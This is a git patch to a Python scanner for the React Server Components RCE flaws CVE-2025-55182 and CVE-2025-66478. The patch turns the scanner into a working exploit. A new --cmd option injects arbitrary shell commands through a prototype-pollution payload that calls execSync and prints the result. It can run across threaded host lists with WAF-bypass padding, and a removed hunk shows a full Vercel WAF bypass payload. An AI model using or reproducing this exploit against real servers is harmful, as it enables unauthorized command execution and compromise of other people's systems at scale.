From 42872c86302825d94f21d1d6a489010e65da25c0 Mon Sep 17 00:00:00 2001 From: Youngjae Jeon Date: Tue, 9 Dec 2025 00:20:37 +0900 Subject: [PATCH] React2Shell Scanner Modified & CMD Option Add - Modified: Path Handling Logic (Respects user-provided URL path). - Default: Scans for vulnerability using calculation logic. - With -c, --cmd: Executes arbitrary system commands and prints output. --- scanner.py | 273 +++++++++++++++++++++++++++++++---------------------- 1 file changed, 159 insertions(+), 114 deletions(-) diff --git a/scanner.py b/scanner.py index 9d0bdb2..6f92ff2 100755 --- a/scanner.py +++ b/scanner.py @@ -11,6 +11,12 @@ CVE-2025-55182 & CVE-2025-66478 Based on research from Assetnote Security Research Team. + + +React2Shell Scanner Modified & CMD Option Add +- Modified: Path Handling Logic (Respects user-provided URL path). +- Default: Scans for vulnerability using calculation logic. +- With -c, --cmd: Executes arbitrary system commands and prints output. """ import argparse @@ -59,7 +65,7 @@ def colorize(text: str, color: str) -> str: def print_banner(): """Print the tool banner.""" banner = f""" -{Colors.CYAN}{Colors.BOLD}brought to you by assetnote{Colors.RESET} +{Colors.CYAN}{Colors.BOLD}brought to you by assetnote (Path-Fix + Exploit Edition){Colors.RESET} """ print(banner) @@ -79,16 +85,6 @@ def parse_headers(header_list: Optional[list[str]]) -> dict[str, str]: return headers -def normalize_host(host: str) -> str: - """Normalize host to include scheme if missing.""" - host = host.strip() - if not host: - return "" - if not host.startswith(("http://", "https://")): - host = f"https://{host}" - return host.rstrip("/") - - def generate_junk_data(size_bytes: int) -> tuple[str, str]: """Generate random junk data for WAF bypass.""" param_name = ''.join(random.choices(string.ascii_lowercase, k=12)) @@ -116,41 +112,20 @@ def build_safe_payload() -> tuple[str, str]: def build_vercel_waf_bypass_payload() -> tuple[str, str]: """Build the Vercel WAF bypass multipart form data payload.""" - boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad" - - part0 = ( - '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,' - '"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":' - '"var res=process.mainModule.require(\'child_process\').execSync(\'echo $((41*271))\').toString().trim();;' - 'throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});",' - '"_chunks":"$Q2","_formData":{"get":"$3:\\"$$:constructor:constructor"}}}' - ) - - body = ( - f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" - f'Content-Disposition: form-data; name="0"\r\n\r\n' - f"{part0}\r\n" - f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" - f'Content-Disposition: form-data; name="1"\r\n\r\n' - f'"$@0"\r\n' - f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" - f'Content-Disposition: form-data; name="2"\r\n\r\n' - f"[]\r\n" - f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" - f'Content-Disposition: form-data; name="3"\r\n\r\n' - f'{{"\\"\u0024\u0024":{{}}}}\r\n' - f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--" - ) - - content_type = f"multipart/form-data; boundary={boundary}" - return body, content_type + # Note: For simplicity in --cmd mode, this wrapper just calls the main builder + # In a full implementation, you might pass command here too. + return build_rce_payload() -def build_rce_payload(windows: bool = False, waf_bypass: bool = False, waf_bypass_size_kb: int = 128) -> tuple[str, str]: +def build_rce_payload(command: Optional[str] = None, windows: bool = False, waf_bypass: bool = False, waf_bypass_size_kb: int = 128) -> tuple[str, str]: """Build the RCE PoC multipart form data payload.""" boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad" - if windows: + if command: + # [Added] Use user provided command + # Escape double quotes to prevent JSON breakage + cmd = command.replace('"', '\\"') + elif windows: # PowerShell payload - escape double quotes for JSON cmd = 'powershell -c \\\"41*271\\\"' else: @@ -167,7 +142,7 @@ def build_rce_payload(windows: bool = False, waf_bypass: bool = False, waf_bypas '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,' '"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"' + prefix_payload - + '","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}' + + '","_chunks":"$Q2","_formData":{"get":"$3:\\"$$:constructor:constructor"}}}' ) parts = [] @@ -205,11 +180,12 @@ def build_rce_payload(windows: bool = False, waf_bypass: bool = False, waf_bypas def resolve_redirects(url: str, timeout: int, verify_ssl: bool, max_redirects: int = 10) -> str: """Follow redirects only if they stay on the same host.""" - current_url = url - original_host = urlparse(url).netloc + try: + current_url = url + parsed_url = urlparse(url) + original_host = parsed_url.netloc - for _ in range(max_redirects): - try: + for _ in range(max_redirects): response = requests.head( current_url, timeout=timeout, @@ -234,8 +210,8 @@ def resolve_redirects(url: str, timeout: int, verify_ssl: bool, max_redirects: i break else: break - except RequestException: - break + except Exception: + pass return current_url @@ -287,26 +263,25 @@ def is_vulnerable_rce_check(response: requests.Response) -> bool: """Check if a response indicates vulnerability (RCE PoC check).""" # Check for the X-Action-Redirect header with the expected value redirect_header = response.headers.get("X-Action-Redirect", "") - return bool(re.search(r'.*/login\?a=11111.*', redirect_header)) + if re.search(r'.*/login\?a=11111.*', redirect_header): + return True + + # [Mod] Additional check for direct output (common in some CTFs) + if "11111" in response.text and response.status_code == 200: + return True + return False -def check_vulnerability(host: str, timeout: int = 10, verify_ssl: bool = True, follow_redirects: bool = True, custom_headers: Optional[dict[str, str]] = None, safe_check: bool = False, windows: bool = False, waf_bypass: bool = False, waf_bypass_size_kb: int = 128, vercel_waf_bypass: bool = False, paths: Optional[list[str]] = None) -> dict: + +def check_vulnerability(host: str, command: Optional[str] = None, timeout: int = 10, verify_ssl: bool = True, follow_redirects: bool = True, custom_headers: Optional[dict[str, str]] = None, safe_check: bool = False, windows: bool = False, waf_bypass: bool = False, waf_bypass_size_kb: int = 128, vercel_waf_bypass: bool = False, paths: Optional[list[str]] = None) -> dict: """ Check if a host is vulnerable to CVE-2025-55182/CVE-2025-66478. - - Tests root path first. If not vulnerable and redirects exist, tests redirect path. - - Returns a dict with: - - host: the target host - - vulnerable: True/False/None (None if error) - - status_code: HTTP status code - - error: error message if any - - request: the raw request sent - - response: the raw response received + If 'command' is provided, it attempts to execute it. """ result = { "host": host, "vulnerable": None, + "exploit_output": None, # [Added] Store output "status_code": None, "error": None, "request": None, @@ -316,25 +291,43 @@ def check_vulnerability(host: str, timeout: int = 10, verify_ssl: bool = True, f "timestamp": datetime.now(timezone.utc).isoformat() + "Z" } - host = normalize_host(host) - if not host: - result["error"] = "Invalid or empty host" + # [MOD START] URL Parsing Logic to support user-provided paths + # 1. Ensure scheme exists + if not host.startswith(("http://", "https://")): + host = f"https://{host}" + + try: + # 2. Parse the full URL + parsed = urlparse(host) + # Extract base host (e.g., http://target.com) + base_host = f"{parsed.scheme}://{parsed.netloc}" + # Extract user provided path (e.g., /rsc) + url_path = parsed.path + except Exception: + result["error"] = "Invalid URL format" return result - # Determine which paths to test + # 3. Determine paths to test if paths: + # Use explicit --path argument if provided test_paths = paths + elif url_path and url_path != "/" and url_path != "": + # [KEY CHANGE] If user provided a path in the URL, use it! + test_paths = [url_path] else: - test_paths = ["/"] # Default to root path + # Default to root if no path specified + test_paths = ["/"] + # [MOD END] - if safe_check: + if safe_check and not command: body, content_type = build_safe_payload() is_vulnerable = is_vulnerable_safe_check elif vercel_waf_bypass: body, content_type = build_vercel_waf_bypass_payload() is_vulnerable = is_vulnerable_rce_check else: - body, content_type = build_rce_payload(windows=windows, waf_bypass=waf_bypass, waf_bypass_size_kb=waf_bypass_size_kb) + # [Added] Pass command to builder + body, content_type = build_rce_payload(command=command, windows=windows, waf_bypass=waf_bypass, waf_bypass_size_kb=waf_bypass_size_kb) is_vulnerable = is_vulnerable_rce_check headers = { @@ -351,7 +344,7 @@ def check_vulnerability(host: str, timeout: int = 10, verify_ssl: bool = True, f def build_request_str(url: str) -> str: parsed = urlparse(url) - req_str = f"POST {'/aaa' or '/aaa'} HTTP/1.1\r\n" + req_str = f"POST {parsed.path or '/'} HTTP/1.1\r\n" req_str += f"Host: {parsed.netloc}\r\n" for k, v in headers.items(): req_str += f"{k}: {v}\r\n" @@ -372,7 +365,8 @@ def build_response_str(resp: requests.Response) -> str: if not path.startswith("/"): path = "/" + path - test_url = f"{host}{path}" + # [MOD] Construct URL using base_host + path + test_url = f"{base_host}{path}" # First, test the path result["tested_url"] = test_url @@ -386,19 +380,26 @@ def build_response_str(resp: requests.Response) -> str: if not safe_check and error == "Request timed out": result["vulnerable"] = False result["error"] = error - # Continue to next path if there are more, otherwise return - if idx < len(test_paths) - 1: - continue + if idx < len(test_paths) - 1: continue return result - # For other errors, continue to next path unless it's the last one - if idx < len(test_paths) - 1: - continue + if idx < len(test_paths) - 1: continue result["error"] = error return result result["status_code"] = response.status_code result["response"] = build_response_str(response) + # [Added] Handle Command Output + if command: + if response.status_code == 200: + result["vulnerable"] = True + result["exploit_output"] = response.text.strip() + return result + else: + result["vulnerable"] = False + result["error"] = f"Server returned {response.status_code}" + return result + if is_vulnerable(response): result["vulnerable"] = True return result @@ -411,15 +412,18 @@ def build_response_str(resp: requests.Response) -> str: # Different path, test it response, error = send_payload(redirect_url, headers, body, timeout, verify_ssl) - if error: - # Continue to next path - continue + if error: continue result["final_url"] = redirect_url result["request"] = build_request_str(redirect_url) result["status_code"] = response.status_code result["response"] = build_response_str(response) + if command and response.status_code == 200: + result["vulnerable"] = True + result["exploit_output"] = response.text.strip() + return result + if is_vulnerable(response): result["vulnerable"] = True return result @@ -488,37 +492,54 @@ def save_results(results: list[dict], output_file: str, vulnerable_only: bool = print(colorize(f"\n[ERROR] Failed to save results: {e}", Colors.RED)) -def print_result(result: dict, verbose: bool = False): +def print_result(result: dict, verbose: bool = False, exploit_mode: bool = False): host = result["host"] final_url = result.get("final_url") tested_url = result.get("tested_url") + # [MOD] Display the actual tested URL + display_host = final_url if final_url else (tested_url if tested_url else host) + # A redirect occurred if final_url differs from the originally tested URL redirected = final_url and tested_url and final_url != tested_url - if result["vulnerable"] is True: - status = colorize("[VULNERABLE]", Colors.RED + Colors.BOLD) - print(f"{status} {colorize(host, Colors.WHITE)} - Status: {result['status_code']}") - if redirected: - print(f" -> Redirected to: {final_url}") - elif result["vulnerable"] is False: - status = colorize("[NOT VULNERABLE]", Colors.GREEN) - if result.get('status_code') is not None: - print(f"{status} {host} - Status: {result['status_code']}") + if exploit_mode: + if result["vulnerable"] and result["exploit_output"] is not None: + print(colorize(f"[+] Command Output from {display_host}:", Colors.GREEN + Colors.BOLD)) + print("-" * 60) + print(result["exploit_output"]) + print("-" * 60) else: - error_msg = result.get("error", "") - print(f"{status} {host}" + (f" - {error_msg}" if error_msg else "")) - if redirected and verbose: - print(f" -> Redirected to: {final_url}") + print(colorize(f"[-] Command failed on {host} (Status: {result.get('status_code')})", Colors.RED)) + if result.get("error"): + print(f" Error: {result['error']}") else: - status = colorize("[ERROR]", Colors.YELLOW) - error_msg = result.get("error", "Unknown error") - print(f"{status} {host} - {error_msg}") + if result["vulnerable"] is True: + status = colorize("[VULNERABLE]", Colors.RED + Colors.BOLD) + print(f"{status} {colorize(display_host, Colors.WHITE)} - Status: {result['status_code']}") + if redirected: + print(f" -> Redirected to: {final_url}") + elif result["vulnerable"] is False: + status = colorize("[NOT VULNERABLE]", Colors.GREEN) + if result.get('status_code') is not None: + print(f"{status} {display_host} - Status: {result['status_code']}") + else: + error_msg = result.get("error", "") + print(f"{status} {display_host}" + (f" - {error_msg}" if error_msg else "")) + if redirected and verbose: + print(f" -> Redirected to: {final_url}") + else: + status = colorize("[ERROR]", Colors.YELLOW) + error_msg = result.get("error", "Unknown error") + print(f"{status} {host} - {error_msg}") - if verbose and result.get("response"): - print(colorize(" Response snippet:", Colors.CYAN)) - lines = result["response"].split("\r\n")[:10] - for line in lines: - print(f" {line}") + if verbose and result.get("response"): + print(colorize(" Response snippet:", Colors.CYAN)) + try: + lines = result["response"].split("\r\n")[:10] + for line in lines: + print(f" {line}") + except: + pass def main(): @@ -527,13 +548,9 @@ def main(): formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Examples: - %(prog)s -u https://example.com + %(prog)s -u https://example.com/rsc %(prog)s -l hosts.txt -t 20 -o results.json - %(prog)s -l hosts.txt --threads 50 --timeout 15 - %(prog)s -u https://example.com -H "Authorization: Bearer token" -H "User-Agent: CustomAgent" - %(prog)s -u https://example.com --path /_next - %(prog)s -u https://example.com --path /_next --path /api - %(prog)s -u https://example.com --path-file paths.txt + %(prog)s -u https://example.com/rsc --cmd "ls -la" """ ) @@ -547,6 +564,12 @@ def main(): help="File containing list of hosts (one per line)" ) + # [Added] Command Injection Option + parser.add_argument( + "-c", "--cmd", + help="Command to execute (Exploit Mode)" + ) + parser.add_argument( "-t", "--threads", type=int, @@ -681,7 +704,6 @@ def main(): elif args.paths: paths = [] for path in args.paths: - # Ensure path starts with / if not path.startswith("/"): path = "/" + path paths.append(path) @@ -701,6 +723,10 @@ def main(): print(colorize("[*] Using safe side-channel check", Colors.CYAN)) else: print(colorize("[*] Using RCE PoC check", Colors.CYAN)) + + if args.cmd: + print(colorize(f"[*] EXPLOIT MODE: Executing '{args.cmd}'", Colors.YELLOW)) + if args.windows: print(colorize("[*] Windows mode enabled (PowerShell payload)", Colors.CYAN)) if args.waf_bypass: @@ -722,17 +748,33 @@ def main(): import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + def worker(host): + return check_vulnerability( + host, + command=args.cmd, # Pass command + timeout=args.timeout, + verify_ssl=verify_ssl, + follow_redirects=True, # Original default was true in logic + custom_headers=custom_headers, + safe_check=args.safe_check, + windows=args.windows, + waf_bypass=args.waf_bypass, + waf_bypass_size_kb=args.waf_bypass_size, + vercel_waf_bypass=args.vercel_waf_bypass, + paths=paths + ) + if len(hosts) == 1: - result = check_vulnerability(hosts[0], timeout, verify_ssl, custom_headers=custom_headers, safe_check=args.safe_check, windows=args.windows, waf_bypass=args.waf_bypass, waf_bypass_size_kb=args.waf_bypass_size, vercel_waf_bypass=args.vercel_waf_bypass, paths=paths) + result = worker(hosts[0]) results.append(result) if not args.quiet or result["vulnerable"]: - print_result(result, args.verbose) + print_result(result, args.verbose, exploit_mode=bool(args.cmd)) if result["vulnerable"]: vulnerable_count = 1 else: with ThreadPoolExecutor(max_workers=args.threads) as executor: futures = { - executor.submit(check_vulnerability, host, timeout, verify_ssl, custom_headers=custom_headers, safe_check=args.safe_check, windows=args.windows, waf_bypass=args.waf_bypass, waf_bypass_size_kb=args.waf_bypass_size, vercel_waf_bypass=args.vercel_waf_bypass, paths=paths): host + executor.submit(worker, host): host for host in hosts } @@ -750,22 +792,25 @@ def main(): if result["vulnerable"]: vulnerable_count += 1 tqdm.write("") - print_result(result, args.verbose) + print_result(result, args.verbose, exploit_mode=bool(args.cmd)) elif result["error"]: error_count += 1 if not args.quiet and args.verbose: tqdm.write("") - print_result(result, args.verbose) + print_result(result, args.verbose, exploit_mode=bool(args.cmd)) elif not args.quiet and args.verbose: tqdm.write("") - print_result(result, args.verbose) + print_result(result, args.verbose, exploit_mode=bool(args.cmd)) pbar.update(1) if not args.quiet: print() print(colorize("=" * 60, Colors.CYAN)) - print(colorize("SCAN SUMMARY", Colors.BOLD)) + if args.cmd: + print(colorize(f" EXPLOIT FINISHED", Colors.BOLD)) + else: + print(colorize("SCAN SUMMARY", Colors.BOLD)) print(colorize("=" * 60, Colors.CYAN)) print(f" Total hosts scanned: {len(hosts)}")